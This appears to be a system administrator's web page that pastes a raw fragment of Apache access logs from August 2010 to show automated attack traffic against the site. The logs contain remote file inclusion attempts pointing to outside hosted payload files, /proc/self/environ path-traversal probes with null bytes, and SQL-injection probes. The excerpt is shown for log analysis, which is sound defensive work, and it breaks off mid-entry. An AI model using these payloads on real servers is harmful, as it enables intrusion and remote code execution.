|
Home | Switchboard | Unix Administration | Red Hat | TCP/IP Networks | Neoliberalism | Toxic Managers |
(slightly skeptical) Educational society promoting "Back to basics" movement against IT overcomplexity and bastardization of classic Unix |
News | Recommended Links | ||||||
|
Recently the number of "strange" access record in web logs jumped and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I have found manually:
|
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /Admin/Tivoli/TMF/Gateways/gateway_troubleshooting.shtml%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 67.223.224.130 - - [16/Aug/2010:07:14:51 -0600] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt?? HTTP/1.1" 302 824 "-" "libwww-perl/5.831" 67.223.224.130 - - [16/Aug/2010:07:14:52 -0600] "GET /400.shtml?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:37 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 89.111.176.226 - - [16/Aug/2010:07:43:47 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:50 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 125.164.72.146 - - [16/Aug/2010:07:48:59 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:00 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:01 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:08 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:09 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:10 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:19 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:20 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:21 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:40 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:41 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:42 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:43 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:44 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:45 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 91.121.1.124 - - [16/Aug/2010:07:52:17 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 62.193.242.164 - - [16/Aug/2010:08:03:41 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813" 62.193.242.164 - - [16/Aug/2010:08:03:43 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813" 209.190.190.5 - - [16/Aug/2010:08:08:36 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14FM SSL-MM/1.4.1 OpenSSL/0.9.7d-dev" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/index.shtml/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /Scripting/php.shtml/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /Scripting/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:07 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 109.86.145.204 - - [16/Aug/2010:09:48:06 -0600] "GET /Malware/Malicious_web/Bulletin/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /Malware/Malicious_web/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 74.8.102.118 - - [16/Aug/2010:10:10:24 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.7dev.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/oss_for_solaris.shtml/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:37 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65" 203.147.62.92 - - [16/Aug/2010:12:21:15 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:51 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.shtml/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] 